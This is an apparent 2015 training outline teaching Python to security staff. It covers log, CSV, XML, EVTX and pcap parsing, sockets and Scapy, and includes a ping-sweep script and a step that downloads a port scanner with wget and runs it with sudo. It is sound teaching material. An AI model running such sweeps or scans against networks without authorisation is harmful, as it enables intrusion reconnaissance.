python - for information security professionals

Here is the Day 1 Video:
https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_5_rec-lw-us-4_240269_recording.mp4

Here is the Day 2 Video:
https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_7_rec-hq-3_241310_recording.mp4

Here is the Day 3 Video:
https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_11_rec-lw-us-7_243144_recording.mp4

Here is the Day 4 Video:
https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_14_rec-hq-6_244377_recording.mp4

Here is the Day 5 Video:
https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_18_rec-hq-6_246395_recording.mp4

Here is the Day 6 Video:
https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_20_rec-hq-2_247633_recording.mp4


#########################################
# Here is the courseware for this month #
#########################################

Class powerpoint slides:
https://s3.amazonaws.com/StrategicSec-Files/Python/PythonV3-1.pptx


Courseware Lab Manual
https://s3.amazonaws.com/StrategicSec-Files/Python/Python-For-InfoSec-Pros-2015.pdf


https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip
        username: strategicsec
        password: strategicsec


The youtube video playlist that I'd like for you to watch is located here:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA


##############################
# Installing Python in Linux #
##############################
The first thing that you will need to do is install dpkt.

sudo apt-get install -y idle

Open IDLE, and let's just dive right in.


#############################
# Lesson 1: Simple Printing #
#############################

>>> print "Today we are learning Python."


#####################################
# Lesson 2: Simple Numbers and Math #
#####################################

>>> 2+2

>>> 6-3

>>> 18/7

>>> 18.0/7

>>> 18.0/7.0

>>> 18/7

>>> 9%4

>>> 8%4

>>> 8.75%.5

>>> 6.*7

>>> 6*6*6

>>> 6**3

>>> 5**12

>>> -5**4


#######################
# Lesson 3: Variables #
#######################

>>> x=18

>>> x+15

>>> x**3

>>> y=54

>>> x+y

>>> g=input("Enter number here: ")
    43

>>> g+32

>>> g**3


###################################
# Lesson 4: Modules and Functions #
###################################

>>> 5**4

>>> pow(5,4)

>>> abs(-18)

>>> abs(5)

>>> floor(18.7)

>>> import math

>>> math.floor(18.7)

>>> math.sqrt(81)

>>> joe = math.sqrt

>>> joe(9)

>>> joe=math.floor

>>> joe(19.8)


##################################
# Lesson 5: How to Save Programs #
##################################
Run "IDLE (Python GUI)"

File -> New Window

print "Python for InfoSec"

File -> Save as
    py4InfoSec.py

Run -> Run Module or Press "F5"


Create a file name.py

x = raw_input("Enter name: ")
print "Hey " + x
raw_input("Press<enter>")


Run -> Run Module or Press "F5"


#####################
# Lesson 6: Strings #
#####################

>>> "XSS"

>>> 'SQLi'

>>> "Joe's a python lover"

>>> 'Joe\'s a python lover'

>>> "Joe said \"InfoSec is fun\" to me"

>>> a = "Joe"

>>> b = "McCray"

>>> a, b

>>> a+b


##########################
# Lesson 7: More Strings #
##########################

>>> num = 10

>>> num + 2

>>> "The number of open ports found on this system is " + num

>>> num = str(18)

>>> "There are " + num + " vulnerabilities found in this environment."

>>> num2 = 46

>>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`


#######################
# Lesson 8: Raw Input #
#######################
Run "IDLE (Python GUI)"

File -> New Window

joemccray=input("Enter name: ")
print joemccray


Run -> Run Module               # Will throw an error
    or
Press "F5"

File -> New Window
joemccray=raw_input("Enter name: ")

Run -> Run Module               # Will throw an error

    or

Press "F5"

NOTE:
Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.


#################################
# Lesson 9: Sequences and Lists #
#################################

>>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']

>>> attacks
['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']

>>> attacks[3]
'SQL Injection'

>>> attacks[-2]
'Cross-Site Scripting'


##########################
# Level 10: If Statement #
##########################
Run "IDLE (Python GUI)"

File -> New Window
attack="SQLI"
if attack=="SQLI":
    print 'The attacker is using SQLI'


Run -> Run Module   or  Press "F5"

File >> New Window
attack="XSS"
if attack=="SQLI":
    print 'The attacker is using SQLI'


Run -> Run Module   or  Press "F5"


#############################
# Reference Videos To Watch #
#############################
Here is your first set of youtube videos that I'd like for you to watch:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)


#####################################
# Lession 11: Intro to Log Analysis #
#####################################

Login to your StrategicSec Ubuntu machine. You can download the VM from the following link:

https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip
        username: strategicsec
        password: strategicsec

Then execute the following commands:
---------------------------------------------------------------------------------------------------------


wget https://s3.amazonaws.com/SecureNinja/Python/access_log


cat access_log | grep 141.101.80.188

cat access_log | grep 141.101.80.187

cat access_log | grep 108.162.216.204

cat access_log | grep 173.245.53.160

---------------------------------------------------------

Google the following terms:
    - Python read file
    - Python read line
    - Python read from file


#########################################################
# Lession 12: Use Python to read in a file line by line #
#########################################################


Reference:
http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/


---------------------------------------------------------
vi logread1.py


## Open the file with read only permit
f = open('access_log', "r")

## use readlines to read all lines in the file
## The variable "lines" is a list containing all lines
lines = f.readlines()

print lines


## close the file after reading the lines.
f.close()

---------------------------------------------------------


Google the following:
    - python difference between readlines and readline
    - python readlines and readline


#################################
# Lession 13: A quick challenge #
#################################

Can you write an if/then statement that looks for this IP and print "Found it"?


141.101.81.187


---------------------------------------------------------
Hint 1: Use Python to look for a value in a list

Reference:
http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html


---------------------------------------------------------
Hint 2: Use Python to prompt for user input

Reference:
http://www.cyberciti.biz/faq/python-raw_input-examples/


---------------------------------------------------------
Hint 3: Use Python to search for a string in a list

Reference:
http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string


Here is one student's solution - can you please this code to me?

#!/usr/bin/python

f = open('access_log')

strUsrinput = raw_input("Enter IP Address: ")

for line in iter(f):
    ip = line.split(" - ")[0]
    if ip == strUsrinput:
        print line

f.close()


-------------------------------

Working with another student after class we came up with another solution:

#!/usr/bin/env python


# This line opens the log file
f=open('access_log',"r")

# This line takes each line in the log file and stores it as an element in the list
lines = f.readlines()


# This lines stores the IP that the user types as a var called userinput
userinput = raw_input("Enter the IP you want to search for: ")


# This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
for ip in lines:
    if ip.find(userinput) != -1:
        print ip


##################################################
# Lession 14: Look for web attacks in a log file #
##################################################

In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log.
Supported attacks:
1.      SQL Injection
2.      Local File Inclusion
3.      Remote File Inclusion
4.      Cross-Site Scripting


wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py

The usage for scan_log.py is simple.  You feed it an apache log file.

cat scan_log.py | less          (use your up/down arrow keys to look through the file)

Explain to me how this script works.


################################
# Lesson 15: Parsing CSV Files #
################################

Dealing with csv files

Reference:
http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/

Type the following commands:
---------------------------------------------------------------------------------------------------------

wget https://s3.amazonaws.com/SecureNinja/Python/class_nessus.csv


Example 1 - Reading CSV files
-----------------------------
#To be able to read csv formated files, we will first have to import the
#csv module.


import csv
with open('class_nessus.csv', 'rb') as f:
    reader = csv.reader(f)
    for row in reader:
        print row


Example 2 - Reading CSV files
-----------------------------
vi readcsv.py


#!/usr/bin/python
import csv                  # imports the csv module
import sys                  # imports the sys module

f = open(sys.argv[1], 'rb')         # opens the csv file
try:
    reader = csv.reader(f)          # creates the reader object
    for row in reader:          # iterates the rows of the file in orders
        print row               # prints each row
finally:
    f.close()               # closing


Example 3 - - Reading CSV files
-------------------------------
vi readcsv2.py


#!/usr/bin/python
# This program will then read it and displays its contents.


import csv

ifile  = open('class_nessus.csv', "rb")
reader = csv.reader(ifile)

rownum = 0
for row in reader:
    # Save header row.
    if rownum == 0:
        header = row
    else:
        colnum = 0
        for col in row:
            print '%-8s: %s' % (header[colnum], col)
            colnum += 1

    rownum += 1

ifile.close()


python readcsv2.py | less


/---------------------------------------------------/
--------------------PARSING CSV FILES----------------
/---------------------------------------------------/

-------------TASK 1------------
vi readcsv3.py

#!/usr/bin/python
import csv
f = open('class_nessus.csv', 'rb')
try:
    rownum = 0
    reader = csv.reader(f)
    for row in reader:
         #Save header row.
        if rownum == 0:
            header = row
        else:
            colnum = 0
            if row[3].lower() == 'high':
                print '%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
        rownum += 1
finally:
    f.close()


python readcsv3.py | less

-------------TASK 2------------
vi readcsv4.py

#!/usr/bin/python
import csv
f = open('class_nessus.csv', 'rb')
try:
    print '/---------------------------------------------------/'
    rownum = 0
    hosts = {}
    reader = csv.reader(f)
    for row in reader:
        # Save header row.
        if rownum == 0:
            header = row
        else:
            colnum = 0
            if row[3].lower() == 'high' and row[4] not in hosts:
                hosts[row[4]] = row[4]
                print '%-1s: %s     %-1s: %s     %-1s: %s     %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
        rownum += 1
finally:
    f.close()


python readcsv4.py | less


################################
# Lesson 16: Parsing XML Files #
################################

/---------------------------------------------------/
--------------------PARSING XML FILES----------------
/---------------------------------------------------/


Type the following commands:
---------------------------------------------------------------------------------------------------------

wget https://s3.amazonaws.com/SecureNinja/Python/samplescan.xml

wget https://s3.amazonaws.com/SecureNinja/Python/application.xml

wget https://s3.amazonaws.com/SecureNinja/Python/security.xml

wget https://s3.amazonaws.com/SecureNinja/Python/system.xml

wget https://s3.amazonaws.com/SecureNinja/Python/sc_xml.xml


-------------TASK 1------------
vi readxml1.py

#!/usr/bin/python
from xmllib import attributes
from xml.dom.minidom import toxml
from xml.dom.minidom import firstChild
from xml.dom import minidom
xmldoc = minidom.parse('sc_xml.xml')
grandNode = xmldoc.firstChild
nodes = grandNode.getElementsByTagName('host')
count = 0

for node in nodes:
    os = node.getElementsByTagName('os')[0]
    osclasses = os.getElementsByTagName('osclass')
    for osclass in osclasses:
        if osclass.attributes['osfamily'].value == 'Windows' and osclass.attributes['osgen'].value == 'XP':
            try:
                print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'OS',os.getElementsByTagName('osmatch')[0].attributes['name'].value)
            except:
                print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','OS',os.getElementsByTagName('osmatch')[0].attributes['name'].value)


-------------TASK 2------------
vi readxml2.py

#!/usr/bin/python
from xmllib import attributes
from xml.dom.minidom import toxml
from xml.dom.minidom import firstChild
from xml.dom import minidom
xmldoc = minidom.parse('sc_xml.xml')
grandNode = xmldoc.firstChild
nodes = grandNode.getElementsByTagName('host')
count = 0
for node in nodes:
    portsNode = node.getElementsByTagName('ports')[0]
    ports = portsNode.getElementsByTagName('port')
    for port in ports:
        if port.attributes['portid'].value == '22' and port.attributes['protocol'].value == 'tcp':
            state = port.getElementsByTagName('state')[0]
            if state.attributes['state'].value == 'open':
                try:
                    print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'Ports','open : tcp : 22')
                except:
                    print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','Ports','open : tcp : 22')


-------------TASK 3------------
vi readxml3.py

#!/usr/bin/python
from xmllib import attributes
from xml.dom.minidom import toxml
from xml.dom.minidom import firstChild
from xml.dom import minidom
xmldoc = minidom.parse('sc_xml.xml')
grandNode = xmldoc.firstChild
nodes = grandNode.getElementsByTagName('host')
count = 0
for node in nodes:
    portsNode = node.getElementsByTagName('ports')[0]
    ports = portsNode.getElementsByTagName('port')
    flag = 0
    for port in ports:
        if flag == 0:
            if port.attributes['protocol'].value == 'tcp' and (port.attributes['portid'].value == '443' or port.attributes['portid'].value == '80'):
                state = port.getElementsByTagName('state')[0]
                if state.attributes['state'].value == 'open':
                    try:
                        print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'Ports','open : tcp : '+port.attributes['portid'].value)
                    except:
                        print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','Ports','open : tcp : '+port.attributes['portid'].value)
                    flag = 1


-------------TASK 4------------
vi readxml4.py

#!/usr/bin/python
from xmllib import attributes
from xml.dom.minidom import toxml
from xml.dom.minidom import firstChild
from xml.dom import minidom
xmldoc = minidom.parse('sc_xml.xml')
grandNode = xmldoc.firstChild
nodes = grandNode.getElementsByTagName('host')
count = 0
for node in nodes:
    flag = 0
    naddress = ''
    addresses = node.getElementsByTagName('address')
    for address in addresses:
        if address.attributes['addrtype'].value == 'ipv4' and address.attributes['addr'].value[0:6] == '10.57.':
            naddress = address.attributes['addr'].value
            flag = 1
    if flag == 1:
        portsNode = node.getElementsByTagName('ports')[0];
        ports = portsNode.getElementsByTagName('port')
        flag = 0
        for port in ports:
                status = {}
                if port.attributes['protocol'].value == 'tcp' and port.attributes['portid'].value[0:2] == '22':
                    state = port.getElementsByTagName('state')[0]
                    if "open" in state.attributes['state'].value:
                        status[0] = state.attributes['state'].value
                        status[1] = port.attributes['portid'].value
                        flag = 1
                else:
                    flag = 0
                if port.attributes['protocol'].value == 'tcp' and flag == 1:
                    if port.attributes['portid'].value == '80' or port.attributes['portid'].value == '443':
                        state = port.getElementsByTagName('state')[0]
                        if state.attributes['state'].value == 'open':
                            flag = 0
                            try:
                                print '%-8s: %s -> %-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'IP',naddress,'Ports',status[0]+' : tcp : '+status[1]+' and open : tcp : '+port.attributes['portid'].value)
                            except:
                                print '%-8s: %s -> %-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','IP',naddress,'Ports',status[0]+' : tcp : '+status[1]+' and open : tcp : '+port.attributes['portid'].value)


################################
# Lesson 17: Parsing EVTX Logs #
################################
/---------------------------------------------------/
--------------------PARSING EVTX FILES----------------
/---------------------------------------------------/


Type the following commands:
---------------------------------------------------------------------------------------------------------

wget https://s3.amazonaws.com/SecureNinja/Python/Program-Inventory.evtx

wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_Application.evtx

wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_Security.evtx

wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_System.evtx


-------------TASK 1------------
vi readevtx1.py

import mmap
import re
import contextlib
import sys
import operator
import HTMLParser
from xml.dom import minidom
from operator import itemgetter, attrgetter

from Evtx.Evtx import FileHeader
from Evtx.Views import evtx_file_xml_view

pars = HTMLParser.HTMLParser()
print pars.unescape('<Data Name="MaxPasswordAge">&amp;12856;"</Data>')
file_name = str(raw_input('Enter EVTX file name without extension : '))
file_name = 'WIN-M751BADISCT_System'
with open(file_name+'.evtx', 'r') as f:
    with contextlib.closing(mmap.mmap(f.fileno(), 0,
                                      access=mmap.ACCESS_READ)) as buf:
        fh = FileHeader(buf, 0x0)
        xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
        try:
            for xml, record in evtx_file_xml_view(fh):
                xml_file += xml
        except:
            pass
        xml_file += "</Events>"
xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
xml_file = re.sub('<local>', '<local></local>', xml_file)
xml_file = re.sub('&amp;', '&amp;', xml_file)
f = open(file_name+'.xml', 'w')
f.write(xml_file)
f.close()
try:
    xmldoc = minidom.parse(file_name+'.xml')
except:
    sys.exit('Invalid file...')
grandNode = xmldoc.firstChild
nodes = grandNode.getElementsByTagName('Event')


event_num = int(raw_input('How many events you want to show : '))
length = int(len(nodes)) - 1
event_id = 0
if event_num > length:
    sys.exit('You have entered an ivalid num...')
while True:
    if event_num > 0 and length > -1:
        try:
            event_id = nodes[length].getElementsByTagName('EventID')[0].childNodes[0].nodeValue
            try:
                print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event',node.getElementsByTagName('string')[1].childNodes[0].nodeValue)
            except:
                print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event','Name not found')
            event_num -= 1
            length -= 1
        except:
            length -= 1
    else:
        sys.exit('...Search Complete...')


-------------TASK 2------------
vi readevtx2.py

import mmap
import re
import contextlib
import sys
import operator
import HTMLParser
from xml.dom import minidom
from operator import itemgetter, attrgetter

from Evtx.Evtx import FileHeader
from Evtx.Views import evtx_file_xml_view

pars = HTMLParser.HTMLParser()
print pars.unescape('<Data Name="MaxPasswordAge">&amp;12856;"</Data>')
file_name = str(raw_input('Enter EVTX file name without extension : '))
file_name = 'WIN-M751BADISCT_System'
with open(file_name+'.evtx', 'r') as f:
    with contextlib.closing(mmap.mmap(f.fileno(), 0,
                                      access=mmap.ACCESS_READ)) as buf:
        fh = FileHeader(buf, 0x0)
        xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
        try:
            for xml, record in evtx_file_xml_view(fh):
                xml_file += xml
        except:
            pass
        xml_file += "</Events>"
xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
xml_file = re.sub('<local>', '<local></local>', xml_file)
xml_file = re.sub('&amp;', '&amp;', xml_file)
f = open(file_name+'.xml', 'w')
f.write(xml_file)
f.close()
try:
    xmldoc = minidom.parse(file_name+'.xml')
except:
    sys.exit('Invalid file...')
grandNode = xmldoc.firstChild
nodes = grandNode.getElementsByTagName('Event')

event = int(raw_input('Enter Event ID : '))
event_id = 0
for node in nodes:
    try:
        event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
        if int(event_id) == event:
            try:
                print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event',node.getElementsByTagName('string')[1].childNodes[0].nodeValue)
            except:
                print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event','Name not found')
    except:
        continue
sys.exit('...Search Complete...')


-------------TASK 3------------
vi readevtx3.py

import mmap
import re
import contextlib
import sys
import operator
import HTMLParser
from xml.dom import minidom
from operator import itemgetter, attrgetter

from Evtx.Evtx import FileHeader
from Evtx.Views import evtx_file_xml_view

pars = HTMLParser.HTMLParser()
print pars.unescape('<Data Name="MaxPasswordAge">&amp;12856;"</Data>')
file_name = str(raw_input('Enter EVTX file name without extension : '))
file_name = 'WIN-M751BADISCT_System'
with open(file_name+'.evtx', 'r') as f:
    with contextlib.closing(mmap.mmap(f.fileno(), 0,
                                      access=mmap.ACCESS_READ)) as buf:
        fh = FileHeader(buf, 0x0)
        xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
        try:
            for xml, record in evtx_file_xml_view(fh):
                xml_file += xml
        except:
            pass
        xml_file += "</Events>"
xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
xml_file = re.sub('<local>', '<local></local>', xml_file)
xml_file = re.sub('&amp;', '&amp;', xml_file)
f = open(file_name+'.xml', 'w')
f.write(xml_file)
f.close()
try:
    xmldoc = minidom.parse(file_name+'.xml')
except:
    sys.exit('Invalid file...')
grandNode = xmldoc.firstChild
nodes = grandNode.getElementsByTagName('Event')

event = int(raw_input('Enter Event ID : '))
event_id = 0
event_count = 0;
for node in nodes:
    try:
        event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
        if int(event_id) == event:
            event_count += 1
    except:
        continue
print '%-8s: %s - %-8s: %s' % ('Event ID',event,'Count',event_count)
sys.exit('...Search Complete...')


-------------TASK 4------------
vi readevtx4.py

import mmap
import re
import contextlib
import sys
import operator
import HTMLParser
from xml.dom import minidom
from operator import itemgetter, attrgetter

from Evtx.Evtx import FileHeader
from Evtx.Views import evtx_file_xml_view

pars = HTMLParser.HTMLParser()
print pars.unescape('<Data Name="MaxPasswordAge">&amp;12856;"</Data>')
file_name = str(raw_input('Enter EVTX file name without extension : '))
file_name = 'WIN-M751BADISCT_System'
with open(file_name+'.evtx', 'r') as f:
    with contextlib.closing(mmap.mmap(f.fileno(), 0,
                                      access=mmap.ACCESS_READ)) as buf:
        fh = FileHeader(buf, 0x0)
        xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
        try:
            for xml, record in evtx_file_xml_view(fh):
                xml_file += xml
        except:
            pass
        xml_file += "</Events>"
xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
xml_file = re.sub('<local>', '<local></local>', xml_file)
xml_file = re.sub('&amp;', '&amp;', xml_file)
f = open(file_name+'.xml', 'w')
f.write(xml_file)
f.close()
try:
    xmldoc = minidom.parse(file_name+'.xml')
except:
    sys.exit('Invalid file...')
grandNode = xmldoc.firstChild
nodes = grandNode.getElementsByTagName('Event')

events = []
event_id = 0
count = 0
for node in nodes:
    try:
        event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
        try:
            events.append({'event_id' : int(event_id), 'event_name' : node.getElementsByTagName('string')[1].childNodes[0].nodeValue})
        except:
            events.append({'event_id' : int(event_id), 'event_name' : 'Name not found...'})
        count += 1
    except:
        continue
events = sorted(events, key=itemgetter('event_id'))
for e in events:
    print e
sys.exit('...Search Complete...')


#################################################
# Lesson 18: Parsing Packets with Python's DPKT #
#################################################
The first thing that you will need to do is install dpkt.

sudo apt-get install -y python-dpkt


Now cd to your courseware directory, and the cd into the subfolder '2-PCAP-Parsing/Resources'.
Run tcpdump to capture a .pcap file that we will use for the next exercise


sudo tcpdump -ni eth0 -s0 -w quick.pcap


--open another command prompt--
wget http://packetlife.net/media/library/12/tcpdump.pdf


Let's do something simple:


vi quickpcap.py
--------------------------------------------------------

#!/usr/bin/python
import dpkt;

# Simple script to read the timestamps in a pcap file
# Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html

f = open("quick.pcap","rb")
pcap = dpkt.pcap.Reader(f)

for ts, buf in pcap:
    print ts;

f.close();


--------------------------------------------------------

Now let's run the script we just wrote


python quickpcap.py


How dpkt breaks down a packet:

Reference:
http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html

    src: the MAC address of SOURCE.
    dst: The MAC address of DESTINATION
    type: The protocol type of contained ethernet payload.

The allowed values are listed in the file "ethernet.py",
such as:
a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data.
b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data.


References:
http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python


Ok - now let's have a look at pcapparsing.py

sudo tcpdump -ni eth0 -s0 -w capture-100.pcap


--open another command prompt--
wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf


Ok - now let's have a look at pcapparsing.py
--------------------------------------------------------

import socket
import dpkt
import sys
f = open('capture-100.pcap','r')
pcapReader = dpkt.pcap.Reader(f)

for ts,data in pcapReader:
    ether = dpkt.ethernet.Ethernet(data)
    if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
    ip = ether.data
    tcp = ip.data
    src = socket.inet_ntoa(ip.src)
    srcport = tcp.sport
    dst = socket.inet_ntoa(ip.dst)
    dstport = tcp.dport
    print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport)

f.close()

--------------------------------------------------------


OK - let's run it:
python pcapparsing.py


running this script might throw an error like this:

Traceback (most recent call last):
  File "pcapparsing.py", line 9, in <module>
    if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise


If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something)


Your homework for today...


Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.


Your challenge is to fix the Traceback error


#!/usr/bin/python

import pcapy
import dpkt
import sys
import socket
import struct

SINGLE_SHOT = False

# list all the network devices
pcapy.findalldevs()

iface = "eth0"
filter = "arp"
max_bytes = 1024
promiscuous = False
read_timeout = 100 # in milliseconds

pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout )
pc.setfilter( filter )

# callback for received packets
def recv_pkts( hdr, data ):
    packet = dpkt.ethernet.Ethernet( data )

    print type( packet.data )
    print "ipsrc: %s, ipdst: %s" %( \
                 socket.inet_ntoa( packet.data.spa ), \
                 socket.inet_ntoa( packet.data.tpa ) )

    print "macsrc: %s, macdst: %s " % (
                "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha),
                "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) )

if SINGLE_SHOT:
    header, data = pc.next()
    sys.exit(0)
else:
    packet_limit = -1 # infinite
    pc.loop( packet_limit, recv_pkts ) # capture packets


#############################
# Reference Videos To Watch #
#############################
Here is your second set of youtube videos that I'd like for you to watch:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20)


#############################################
# Lesson 19: Python Sockets & Port Scanning #
#############################################


$ ncat -l -v -p 1234


--open another terminal--
python

>>> import socket
>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>>> s.connect(('localhost', 1234))
>>> s.send('Hello, world')
>>> data = s.recv(1024)
>>> s.close()

>>> print 'Received', 'data'


########################################
# Lesson 20: TCP Client and TCP Server #
########################################

vi tcpclient.py


#!/usr/bin/python
# tcpclient.py

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
hostport = ("127.0.0.1", 1337)
s.connect(hostport)
s.send("Hello\n")
buf = s.recv(1024)
print "Received", buf


vi tcpserver.py


#!/usr/bin/python
# tcpserver.py

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
hostport = ("", 1337)
s.bind(hostport)
s.listen(10)
while 1:
    cli,addr = s.accept()
    print "Connection from", addr
    buf = cli.recv(1024)
    print "Received", buf
    if buf == "Hello\n":
        cli.send("Server ID 1\n")
    cli.close()


python tcpserver.py


--open another terminal--
python tcpclient.py


########################################
# Lesson 21: UDP Client and UDP Server #
########################################

vi udpclient.py


#!/usr/bin/python
# udpclient.py

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
hostport = ("127.0.0.1", 1337)
s.sendto("Hello\n", hostport)
buf = s.recv(1024)
print buf


vi udpserver.py


#!/usr/bin/python
# udpserver.py

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
hostport = ("127.0.0.1", 1337)
s.bind(hostport)
while 1:
    buf, address = s.recvfrom(1024)
    print buf
    if buf == "Hello\n":
        s.sendto("Server ID 1\n", address)


python udpserver.py


--open another terminal--
python udpclient.py


###############################
# Lesson 22: Installing Scapy #
###############################

sudo apt-get update
sudo apt-get install python-scapy python-pyx python-gnuplot


Reference Page For All Of The Commands We Will Be Running:
http://samsclass.info/124/proj11/proj17-scapy.html

Great slides for Scapy:
http://www.secdev.org/conf/scapy_csw05.pdf


To run Scapy interactively

    sudo scapy


################################################
# Lesson 23: Sending ICMPv4 Packets with scapy #
################################################

In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:

    i = IP()


This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:

    i.display()


Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:

    i.dst="10.65.75.49"

    i.display()


Notice that scapy automatically fills in your machine's source IP address.

Use these commands to create an object named ic of type ICMP and display its properties:


    ic = ICMP()

    ic.display()


Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:

    sr1(i/ic)


This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. As you can see in the image above, the response is shown, with ICMP type echo-reply.

The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.

Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):


    sr1(i/ic/"YOUR NAME")


You should see a reply with a Raw section containing your name.


##############################################
# Lesson 24: Sending a UDP Packet with Scapy #
##############################################


Preparing the Target
$ ncat -ulvp 4444


--open another terminal--
In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:

    u = UDP()

    u.display()


This creates an object named u of type UDP, and displays its properties.

Execute these commands to change the destination port to 4444 and display the properties again:

    i.dst="10.10.2.97"              <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)

    u.dport = 4444

    u.display()


Execute this command to send the packet to the Windows machine:

    send(i/u/"YOUR NAME SENT VIA UDP\n")


On the Windows target, you should see the message appear


#######################################
# Lesson 25: Ping Sweeping with Scapy #
#######################################


#!/usr/bin/python
from scapy.all import *

TIMEOUT = 2
conf.verb = 0
for ip in range(0, 256):
    packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP()
    reply = sr1(packet, timeout=TIMEOUT)
    if not (reply is None):
         print reply.dst, "is online"
    else:
         print "Timeout waiting for %s" % packet[IP].dst


###############################################
# Checking out some scapy based port scanners #
###############################################

wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py

cat rdp_scan.py

sudo python rdp_scan.py 10.10.30.250


######################################
# Dealing with conf.verb=0 NameError #
######################################

conf.verb = 0
NameError: name 'conf' is not defined

Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from:

from scapy import *
    to
from scapy.all import *


Reference:
http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html


conf.verb=0 is a verbosity setting (configuration/verbosity = conv


Here are some good Scapy references:
http://www.secdev.org/projects/scapy/doc/index.html
http://resources.infosecinstitute.com/port-scanning-using-scapy/
http://www.hackerzvoice.net/ouah/blackmagic.txt
